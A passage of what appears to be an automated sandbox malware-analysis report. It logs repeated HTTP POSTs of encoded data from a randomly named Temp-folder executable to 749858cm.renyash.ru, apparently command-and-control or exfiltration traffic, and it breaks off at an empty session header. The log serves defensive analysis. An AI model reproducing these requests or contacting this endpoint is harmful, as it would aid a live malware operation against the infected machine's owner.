Dec 17, 2024 00:08:32.194981098 CET	1060	OUT	Data Raw: 58 5a 46 57 59 5b 54 52 5d 5a 59 53 57 58 5a 54 5a 57 5f 5a 51 52 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XZFWY[TR]ZYSWXZTZW_ZQRRB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#(?.U*-<0<]0-\4:4^::<++&!&T=>%[ 4?Z=8"F"#Y (
Dec 17, 2024 00:08:32.929598093 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:33.190766096 CET	806	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ci%2FNLcQQor8EDXwYabM4I5tYrI6bOUgQSpl%2FzoreCBsFauzT4YYDWoHUv5I1v4BT2tmE66%2B4Wpc3ByYjYzLShVbPoX4HcX%2BahpqpRdxNmjiXmS0Sgl%2FwmjYyT5Eh5o0SIKxla5lK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325600da7fc32f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6739&min_rtt=1708&rtt_var=10703&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=34796&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49853	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:33.438738108 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:33.788748026 CET	1060	OUT	Data Raw: 58 5a 46 50 59 5e 51 5e 5d 5a 59 53 57 53 5a 52 5a 5f 5f 5f 51 53 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XZFPY^Q^]ZYSWSZRZ___QSRG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#???-;]04\0.3"*-;?&1)>!\ \)"F"#Y
Dec 17, 2024 00:08:34.526000977 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:34.782382011 CET	806	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lvbHjyJQdi5tIKm9Z2gLwavrye3aR90CnE3QVCbrCaKPolYZNfCDd2RhN2GPEBxxnDJ%2FrhpVSno%2Futne0AZWv2Mj6UrdIVj2gGG%2FCrNAhZvoVW8mqknKP9ZUH%2F9slysNoEuhjq%2Fj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32560ac928de94-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8135&min_rtt=1473&rtt_var=13876&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=26657&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49859	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:35.030173063 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1056 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:35.382685900 CET	1056	OUT	Data Raw: 5d 57 43 53 59 5f 51 5f 5d 5a 59 53 57 5b 5a 50 5a 5f 5f 5f 51 5d 52 48 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]WCSY_Q_]ZYSW[ZPZ___Q]RH]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#()=+\$373[<4(:?8/112>=&7?>"F"#Y
Dec 17, 2024 00:08:36.123096943 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:36.381699085 CET	799	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iahL6zjfiORNDzPAyopRjLn2EoB5v8XQg36d2uFzAI8v7HrRs2BbeZypLmdufc845CyclSITsA%2F4B4jBpN7REOXpS4bfWFnsxAOwgh4B4ze%2BIKdh01dlCST4KiR849puvrgU9sBJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325614c9cf43dd-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4181&min_rtt=1796&rtt_var=5444&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=69923&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49860	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:35.035379887 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:35.382519960 CET	1936	OUT	Data Raw: 58 55 46 51 59 59 54 5e 5d 5a 59 53 57 53 5a 57 5a 53 5f 5d 51 5d 52 40 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XUFQYYT^]ZYSWSZWZS_]Q]R@]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y X+/)('0$><7:?Y?]4219(=%]4 =("F"#Y
Dec 17, 2024 00:08:36.124504089 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:36.373620987 CET	950	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCoNHsNX0lrqsIEmYp1CIleR2a15OK1MDDFr%2FgMo69xwh4ddfmev0qvUsdOC2HbJugUMji4fpmutj7hLIEI8VIhCerWxyBfK%2BpDg%2FGWC8FJSj4VOb6rRtuHaM2wsYOC47W4XxOby"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325614c82b41a9-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4337&min_rtt=2171&rtt_var=5146&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=74871&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 39 1d 27 13 36 5b 37 00 33 1a 29 59 3c 1f 24 0a 35 14 2f 2f 02 40 24 33 21 00 25 31 26 00 31 1d 38 02 20 08 28 1d 33 32 34 1f 31 37 23 5d 01 1b 24 18 33 00 35 06 3f 01 0f 00 24 56 21 1e 24 2d 3f 0b 32 27 30 57 31 33 05 55 21 16 04 10 2f 32 22 59 2b 2c 38 00 2e 56 25 5d 20 04 21 52 0d 13 21 0c 30 5e 3e 5e 24 22 27 12 20 33 09 5b 36 37 37 57 33 05 37 53 32 04 34 1f 30 01 26 12 26 06 33 16 2a 5e 3e 53 37 22 34 1f 3c 04 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 989'6[73)Y<$5//@$3!%1&18 (32417#]$35?$V!$-?2'0W13U!/2"Y+,8.V%] !R!0^>^$"' 3[677W37S240&&3*^>S7"4< R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49866	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:36.614048958 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:36.960706949 CET	1060	OUT	Data Raw: 58 51 46 51 59 5b 54 59 5d 5a 59 53 57 59 5a 57 5a 55 5f 5d 51 52 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XQFQY[TY]ZYSWYZWZU_]QRRB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y ),.U)[ %#$%-?7:?:\?X+(#R%>T>X=Z443\*"F"#Y ,
Dec 17, 2024 00:08:37.700295925 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:37.956676006 CET	803	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPUwrF4IMs1oDmftOMOmVuHSwXlFeAJSB3Zw1WuNfW1xkRSnjluLHG0l4AUI0rlFyzx%2F9QQMrrnZYsRXGO4wd%2Fg09jQ0WjSc%2BO8j8F%2FxU2tLG2jAB86NgzFq1H5BUnzCTH8sLIXN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32561eac6a8c45-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4395&min_rtt=1926&rtt_var=5660&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=67343&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49867	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:38.202512980 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:38.554647923 CET	1060	OUT	Data Raw: 58 55 46 56 59 59 51 5a 5d 5a 59 53 57 52 5a 53 5a 5f 5f 58 51 5e 52 49 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XUFVYYQZ]ZYSWRZSZ__XQ^RI]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y <)?=#$V X$^7);9:$<P&1"S*%]4?\(8"F"#Y
Dec 17, 2024 00:08:39.288321972 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:39.538472891 CET	806	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IdfHp64qVjurIzOediS%2BwC3g5hBUaRmDfLODni4MDw9eUl7nSm%2ByQBXQtLOZwguV0SVs5UdYNlEaWHsetequ%2FjwEezrQS9hOY9B%2BA9zWc%2F27oftvmxNSRp5fkLh8A50r5gyoe1Eb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32562898fdc3fd-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6658&min_rtt=1509&rtt_var=10864&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=34190&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49873	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:39.784188986 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:40.132503986 CET	1060	OUT	Data Raw: 5d 52 46 50 5c 5f 54 5e 5d 5a 59 53 57 5a 5a 54 5a 57 5f 5c 51 5a 52 44 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RFP\_T^]ZYSWZZTZW_\QZRD]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y X+>U?-#_%0$'3[#4].:7]+(?%!!>Z#;)8"F"#Y
Dec 17, 2024 00:08:40.876115084 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:41.146778107 CET	803	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Ko8pkjq%2F7Cl%2F9BBVdcNYFl6lDi5bdsaf49LB%2BzfPiscHqVLfvG9kvo9dt0rD0SuZAPF8rANBz%2FXDL5L1nvQ9ZN9HZvcqcBuBNY3Gc3rJVmvEUvMzlBdvSW3qGDcWWQL0sagGj09"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256327ece0cbe-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3693&min_rtt=1718&rtt_var=4594&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=83333&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49879	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:41.611969948 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:41.961016893 CET	1060	OUT	Data Raw: 58 52 46 53 59 59 51 5e 5d 5a 59 53 57 5f 5a 52 5a 5e 5f 58 51 53 52 49 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XRFSYYQ^]ZYSW_ZRZ^_XQSRI]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+S?-#'8%./] 979 )+R%">)=*4](("F"#Y 4
Dec 17, 2024 00:08:42.641963005 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:42.892690897 CET	799	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K45rn4dimRw4wGKBj302KHFDDGzsBqcc1sdzt5sH%2FH%2BcyL1HHcuszgbfHgsjMSbJKn5Gw9tWPLqewNplJ8LJonSRXHfaQYZQo5XNldrClIPfFmrRHBtiAj2qdYXnqe2Q5MP280e3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32563d8ef642bd-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3708&min_rtt=1768&rtt_var=4544&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=84427&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49880	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:41.612075090 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1908 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:41.961031914 CET	1908	OUT	Data Raw: 5d 57 46 53 59 50 54 5f 5d 5a 59 53 57 52 5a 51 5a 56 5f 58 51 5d 52 45 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]WFSYPT_]ZYSWRZQZV_XQ]RE]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Z+?>=?30 _03^7)<:9#?3R%">>%78="F"#Y
Dec 17, 2024 00:08:42.646148920 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:42.904978037 CET	948	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zITDmz251k7Chii9fNoY9CLqHX%2FrlKaDnFjsBTUAOSMsKiMaawGSwYBNUR%2BAQCwhLvaxFzfa57BQnb6q8Yr9F4z62x0lcJeT1LmBmLY%2FJTJWujSjX3B34JNZj6E%2Fk4gtRGAQc4wP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32563d8c067274-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7351&min_rtt=2042&rtt_var=11384&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2198&delivery_rate=32795&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 3a 0f 24 2d 0f 06 21 3d 2f 52 3e 3f 05 0b 27 0d 2e 06 38 3f 0d 18 25 33 3e 5a 32 21 3a 00 25 34 37 5d 34 0f 30 1d 24 22 30 1e 25 27 23 5d 01 1b 24 18 33 2e 39 01 3f 3f 26 10 27 20 2e 46 26 2e 19 08 25 1a 2f 0b 32 0a 3f 1e 22 2b 21 04 2c 1c 0c 58 3c 3c 20 01 2e 20 2e 02 20 14 21 52 0d 13 21 0a 24 06 0c 5a 33 22 20 03 23 0d 28 00 23 34 01 18 30 5a 37 53 24 39 24 1f 24 2c 36 1d 31 16 05 5e 3e 06 22 53 34 1c 01 0f 3c 3e 20 52 2c 05 20 50 04 35 54 53 0d 0a Data Ascii: 98:$-!=/R>?'.8?%3>Z2!:%47]40$"0%'#]$3.9??&' .F&.%/2?"+!,X<< . . !R!$Z3" #(#40Z7S$9$$,61^>"S4<> R, P5TS
Dec 17, 2024 00:08:43.096213102 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49887	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:43.345784903 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:43.695163965 CET	1060	OUT	Data Raw: 58 5a 43 5d 5c 5b 54 52 5d 5a 59 53 57 5d 5a 50 5a 50 5f 5b 51 52 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XZC]\[TR]ZYSW]ZPZP_[QRRB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+?=04]37^"9 ].*$]?R$"(..7$'$8"F"#Y <
Dec 17, 2024 00:08:44.431359053 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:44.759542942 CET	799	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4B8t04eraWgVzJ%2FjQInF2PvUt3HzEr5le56JOqXYSe1fPeahJW1jsf5iCmnB8zi%2FQuMFGUw9SGMQRVp5lL6SlDMRHoXXKsYM0brKSTCB4GRsXaOnTMxdo78o1L9dlxs6kvjFsbMB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325648b97043fa-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4600&min_rtt=1714&rtt_var=6416&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=58851&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49892	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
